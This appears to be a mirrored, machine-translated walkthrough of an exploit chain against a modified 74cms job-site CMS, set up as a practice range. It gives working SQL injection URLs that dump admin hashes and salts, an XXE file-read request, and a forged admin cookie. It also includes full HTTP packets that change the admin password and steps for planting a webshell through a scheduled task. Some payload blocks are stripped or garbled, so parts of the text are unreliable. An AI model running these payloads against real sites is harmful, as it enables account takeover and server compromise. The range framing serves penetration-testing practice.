Share
## https://sploitus.com/exploit?id=9BCE8A35-5F82-5FF4-A724-1CD27DB7A240
# Exploit-chain
Exploit chain range building and penetration ~xxe file read + sql injection + code audit + override vulnerabilities

# Preface

The range is based on the 74cms modification, mainly modify the

1. the creation of the administrator to change the password of the override vulnerability

1. ! [image](https://congsec23.oss-cn-beijing.aliyuncs.com/picture/network-asset-image-20250327015825-r6xj0b2.png)
2. Remove administrator checksums on old passwords.
3. Preventing failure to reproduce the xxe vulnerability due to experimental environments

1. ! [image](https://congsec23.oss-cn-beijing.aliyuncs.com/picture/network-asset-image-20250327015330-u48y5lg.png)

Source code download address: https://pan.baidu.com/s/16HVs\_XXa-Tkp9AgcgAwMvg?pwd\=cong

# Penetration Ideas

- Three vulnerabilities (two frontend vulnerabilities and one backend vulnerability), as well as source code leakage issues, were identified through scanners and information gathering.
- The two frontend vulnerabilities are file reading and SQL injection.
- Use the file read vulnerability to read the `/data/config.php` file and get the source code salt value in it; then use the SQL injection vulnerability in the frontend to get the salt value of the `admin` user in the database, and also notice the existence of a user `cong`.
- Weak password blasting on `cong` user, found that the password is `123456`. After successfully logging in to the backend, it is found that there are insufficient privileges to exploit the command execution vulnerability in the backend.
- To address the problem of insufficient privileges, try to elevate the privileges. Through the source code leaked code analysis, found that the background of the password change function has overstepped the rights of the vulnerability.
- Using the two salts obtained from the foreground, we constructed a fake cookie for the `admin` user, performed an override operation, and successfully changed the administrator password. Eventually, we logged in to the administrator account and successfully changed the administrator password.
- Eventually logged into the administrator's account, and successfully utilized the command execution vulnerability in the background to obtain the server shell.

# Environment setup

### docker setup

1. Download the necessary configuration file, download link (https://pan.baidu.com/s/1nkyiaCDLG9paa4fC281vcw?pwd\=cong)
2. Execute `docker-compose build` in the current directory. 3.
3. Execute `docker-compose up -d`.

1. ! [image](https://congsec23.oss-cn-beijing.aliyuncs.com/picture/network-asset-image-20250404180532-pje76z9.png)

### Source build

1. Directly download [website source code](https://pan.baidu.com/s/16HVs_XXa-Tkp9AgcgAwMvg?pwd=cong) and put it in phpstudy or pagoda.
2. After building, visit url/install to install.
3. administrator login, click change password function (no need to change) after /temp/templates\_c under the c\_1\_users\_admin\_users\_edit\_pwd\_htm.php file can be deleted in the following code (some of the useless front-end code, put there may lead to misleading)

1. ! [image](https://congsec23.oss-cn-beijing.aliyuncs.com/picture/network-asset-image-20250326170601-a8lk7dw.png)
2. ! [image](https://congsec23.oss-cn-beijing.aliyuncs.com/picture/network-asset-image-20250326170606-jgxa6j8.png)

# Infiltration process

1. first scan the website with a comprehensive scanner to get three vulnerabilities, one is **Frontend** file read, one is **Frontend** sql injection, and one is **Backend** command execution vulnerability.
2. ### sql injection vulnerability

1. ##### check database

1. ```hljs
http://121.196.230.42/plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20union%20select%201,2,3,4,5,6,7,database(),9%23
Result:
474cms
```
2. ! [image](https://congsec23.oss-cn-beijing.aliyuncs.com/picture/network-asset-image-20250326161840-vsekxfw.png)
2. ##### lookup table

1. ```hljs
http://121.196.230.42/plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20union%20select%201,2,3,4,5,6,7,table_name,9%20from% 20information_schema.tables%20where%20table_schema=database()%23
Result:
4qs_ad
4qs_ad_category
4qs_admin
4qs_admin_log
4qs_article
4qs_article_category
4qs_article_property
4qs_audit_reason
4qs_baiduxml
4qs_captcha
4qs_category
4qs_category_district
4qs_category_group
4qs_category_jobs
4qs_company_down_resume
4qs_company_favorites
4qs_company_interview
4qs_company_profile
4qs_config
4qs_crons
4qs_explain
4qs_explain_category
4qs_feedback
4qs_help
4qs_help_category
4qs_hotword
4qs_hrtools
4qs_hrtools_category
4qs_jobs
4qs_jobs_contact
4qs_jobs_search_hot
4qs_jobs_search_key
4qs_jobs_search_rtime
4qs_jobs_search_scale
4qs_jobs_search_stickrtime
4qs_jobs_search_tag
4qs_jobs_search_wage
4qs_jobs_tmp
4qs_link
4qs_link_category
4qs_locoyspider
4qs_mail_templates
4qs_mailconfig
4qs_mailqueue
4qs_members
4qs_members_buddy
4qs_members_charge_log
4qs_members_handsel
4qs_members_info
4qs_members_log
4qs_members_points
4qs_members_points_rule
4qs_members_setmeal
4qs_navigation
4qs_navigation_category
4qs_notice
4qs_notice_category
4qs_order
4qs_page
4qs_payment
4qs_personal_favorites
4qs_personal_jobs_apply
4qs_pms
4qs_pms_reply
4qs_pms_sys
4qs_pms_sys_log
4qs_promotion
4qs_promotion_category
4qs_report
4qs_resume
4qs_resume_education
4qs_resume_jobs
4qs_resume_search_key
4qs_resume_search_rtime
4qs_resume_search_tag
4qs_resume_tmp
4qs_resume_training
4qs_resume_work
4qs_setmeal
4qs_simple
4qs_sms_config
4qs_sms_templates
4qs_smsqueue
4qs_syslog
4qs_text
4qs_tpl
```
2. ! [image](https://congsec23.oss-cn-beijing.aliyuncs.com/picture/network-asset-image-20250326161907-v4y2690.png)
3. ##### check field

1. ```hljs
http://121.196.230.42/plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20union%20select%201,2,3,4,5,6,7,group_concat(column_name),9% 20from%20information_schema.columns%20where%20table_name=0x71735f61646d696e%23
Result:
4admin_id,admin_name,email,pwd,pwd_hash,purview,rank,add_time,last_login_time,last_login_ip
```
2. ! [image](https://congsec23.oss-cn-beijing.aliyuncs.com/picture/network-asset-image-20250326162145-c845gmq.png)
4. ##### check data

1. ```hljs
http://121.196.230.42/plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20union%20select%201,2,3,4,5,6,7,group_concat(0x5c,admin_name. 0x5c,pwd,0x5c,pwd_hash),9%20from%2074cms.qs_admin%23
Result:
4\admin\71f6fa5df85b8f1da7be635d840c8aee\xODxdi,\cong\2e308a7e5aae4a6b23b59190c30f1fe9\1h1BEg
```
2. ! [image](https://congsec23.oss-cn-beijing.aliyuncs.com/picture/network-asset-image-20250327020534-53h8qkd.png)
5. Here we can check the salt value pwd\_hash\=xODxdi, ped\=71f6fa5df85b8f1da7be635d840c8aee corresponding to the admin user of the database.
3. ### xxe file reading

1. Just find a few random articles to follow and reproduce, [link](https://qkl.seebug.org/vuldb/ssvid-94147)
2. poc as follows

1. ``hljs''
POST /plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709&timestamp=&nonce= HTTP/1.1
Host: 121.196.230.42
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: text/xml
Content-Length: 292



Content-Length: 292

&test.
1111
2222
subscribe

```
2. ! [image](https://congsec23.oss-cn-beijing.aliyuncs.com/picture/network-asset-image-20250327020441-ej465op.png)
3. Get the source code salt: \$QS\_pwdhash \= "IZ6f!zjC6XKxPe1\=";".
4. ### Source code leakage

1. find these vulnerabilities is not enough to exploit the webshell, through the dirsearch scanning to get the background address and source code leaks

1. ! [image](https://congsec23.oss-cn-beijing.aliyuncs.com/picture/network-asset-image-20250326162908-5alh58a.png)
2. ! [image](https://congsec23.oss-cn-beijing.aliyuncs.com/picture/network-asset-image-20250326162920-nunx4bz.png)
5. ### Weak password login

1. Above sql injection get two users, they are admin and cong, do weak password blasting on them to get
2. cong's password is 123456, but the click to go to the authority is not enough, the background of the command execution vulnerability can not be reproduced, so we want to webshell need to utilize the next vulnerability
3. so we open the source code to analyze
6. ### Code Audit

1. because we get a normal user cong, only admin has the permission to reproduce the vulnerability, so we need to find the override vulnerability, from cong to admin.
2. In the backend administrator password (admin/admin\_users.php), we found that to change the administrator's password, we need to meet the requirement that the session (impossible because it is stored in the server and cannot be changed) is administrator or that the check\_cookie is true. the declaration of the

1. ! [image](https://congsec23.oss-cn-beijing.aliyuncs.com/picture/network-asset-image-20250326171543-4hrxyxh.png)
2. ! [image](https://congsec23.oss-cn-beijing.aliyuncs.com/picture/network-asset-image-20250326171554-14oqvbz.png)
3. As shown in the image, check\_cookie is to accept the value passed in by the cookie, and the value of the cookie can be controlled, this code `md5($user['admin_name']. $user['pwd']. $user['pwd_hash']. $QS_pwdhash) == $pwd` where `$user['admin_name'] is the `administrator's account number (admin), `$user['pwd']` has the value of the administrator's pwd value that was just injected by the sql (71f6fa5df85b8f1da7be635d840c8aee) and `$user['pwd_hash']. 'pwd_hash']` value is the sql injected admin pwd\_hash (xODxdi), `$QS_pwdhash` is the salt value of the source code (IZ6f!zjC6XKxPe1\=), so we can by splicing the above and md5 encrypted is the value of the pwd of the check\_cookie function. That is, `4c95fcaa6a4248e5a5a7922ed4ae93a4`.

1. ! [image](https://congsec23.oss-cn-beijing.aliyuncs.com/picture/network-asset-image-20250326171854-kqal1vt.png)
4. So all we need to do is pass the value `Qishi[admin_name]=admin;Qishi[admin_pwd]=4c95fcaa6a4248e5a5a7922ed4ae93a4;` in the cookie to bypass the
7. ### Ultra vires vulnerability

1. we can get the source code deployed locally, so that it is more convenient for us to test and reproduce the vulnerability, then here we will build the local admin password is known
2. We click on the password, and then change the password to catch the package.

1. ! [image](https://congsec23.oss-cn-beijing.aliyuncs.com/picture/network-asset-image-20250326190201-1bfactg.png)
3. you can catch three packets, these two packets in a row, save the packet needs to be the last packet of the return packet of the hiddentoken value, then then we can pass in the cookie just now that cookie, in the modification of the host field can modify the old target target machine administrator admin password, it should be noted that The phpsessid needs to be replaced with the phpsession of the cong user, and also in the login state, in order to keep the session alive and effective.
4. change the password packet as follows
5. you can catch three packets, respectively, in these three packets insert `Qishi[admin_name]=admin;Qishi[admin_pwd]=4c95fcaa6a4248e5a5a7922ed4ae93a4;`, and change the corresponding value of the id can be

1. ! [image](assets/network-asset-image-20250327021436-b6bal5i.png "first packet") first packet
2. ! [image](assets/network-asset-image-20250327021508-ngebnh4.png "second packet") second packet
3. ! [image](assets/network-asset-image-20250327021514-eangsxd.png "third packet") third packet
4. poc

1. ``hljs''
First packet:
GET /admin/admin_users.php?act=edit_users_pwd&id=1 HTTP/1.1
Host: 121.196.230.42
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed- exchange;v=b3;q=0.7
Referer: http://121.196.230.42/admin/admin_users.php
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: Qishi[admin_name]=admin;Qishi[admin_pwd]=4c95fcaa6a4248e5a5a7922ed4ae93a4;12e74ef8323a2621269479a83ab5bcb7_ssl=3fbd1e8e- 2c9b-45d4-9a7f-c6aa722d4c59.QVEx7vCgv9bcqpnimCvw4QMirvQ; PHPSESSID=6cdbavi5ool836faokg51c9ei7; 12e74ef8323a2621269479a83ab5bcb7= e902ccc6-b392-4111-8abe-113402938b37.6BeGfz7N40S_7a-gs-JH48cLOVI; http_Path=%2Fwww%2Fwwwroot%2F74cms%2Ftemp%2Ftemplates_c
Connection: keep-alive

Second packet:
POST /admin/admin_users.php?act=edit_users_pwd_save HTTP/1.1
Host: 121.196.230.42
Content-Length: 79
Cache-Control: max-age=0
Origin: http://121.196.230.42
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed- exchange;v=b3;q=0.7
Referer: http://121.196.230.42/admin/admin_users.php?act=edit_users_pwd&id=1
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: Qishi[admin_name]=admin;Qishi[admin_pwd]=4c95fcaa6a4248e5a5a7922ed4ae93a4;12e74ef8323a2621269479a83ab5bcb7_ssl=3fbd1e8e- 2c9b-45d4-9a7f-c6aa722d4c59.QVEx7vCgv9bcqpnimCvw4QMirvQ; PHPSESSID=6cdbavi5ool836faokg51c9ei7; 12e74ef8323a2621269479a83ab5bcb7= e902ccc6-b392-4111-8abe-113402938b37.6BeGfz7N40S_7a-gs-JH48cLOVI; http_Path=%2Fwww%2Fwwwroot%2F74cms%2Ftemp%2Ftemplates_c
Connection: keep-alive

hiddentoken=36c46759&password=333333&password1=333333&id=1&submit3=%D0%DE%B8%C4

Third packet:
GET /admin/admin_users.php?act=edit_users_pwd&id=1 HTTP/1.1
Host: 121.196.230.42
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed- exchange;v=b3;q=0.7
Referer: http://121.196.230.42/admin/admin_users.php
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: Qishi[admin_name]=admin;Qishi[admin_pwd]=4c95fcaa6a4248e5a5a7922ed4ae93a4;12e74ef8323a2621269479a83ab5bcb7_ssl=3fbd1e8e- 2c9b-45d4-9a7f-c6aa722d4c59.QVEx7vCgv9bcqpnimCvw4QMirvQ; PHPSESSID=6cdbavi5ool836faokg51c9ei7; 12e74ef8323a2621269479a83ab5bcb7= e902ccc6-b392-4111-8abe-113402938b37.6BeGfz7N40S_7a-gs-JH48cLOVI; http_Path=%2Fwww%2Fwwwroot%2F74cms%2Ftemp%2Ftemplates_c
Connection: keep-alive


```
6. Log out of the cong user login and log in to admin with password 333333
8. ### Command execution vulnerability

1. Ock, we finally got the admin user, now we come to the last one, the command execution vulnerability, related article: [link](https://qkl.seebug.org/vuldb/ssvid-94093)
2. Write the following code into hacker.txt, change the suffix to hacker.doc

1. ``hljs
');
? >
```.
3. Upload hacker.doc in hr toolbox, get path address: /data/hrtools/2025/03/1743014069211.doc

1. ! [image](https://congsec23.oss-cn-beijing.aliyuncs.com/picture/network-asset-image-20250327023614-2utal0a.png)
4. Add a scheduled task with the following configuration

1. ! [image](https://congsec23.oss-cn-beijing.aliyuncs.com/picture/network-asset-image-20250327022813-sb0ormo.png)
2. ! [image](https://congsec23.oss-cn-beijing.aliyuncs.com/picture/network-asset-image-20250327023034-ygj7rxi.png)
5. Click execute and it will generate shell.php in /data/backup directory, then use antsword to connect to it, the password is pass.

1. ! [image](https://congsec23.oss-cn-beijing.aliyuncs.com/picture/network-asset-image-20250327024338-yf5lmze.png)

โ€

โ€

โ€

โ€

โ€

โ€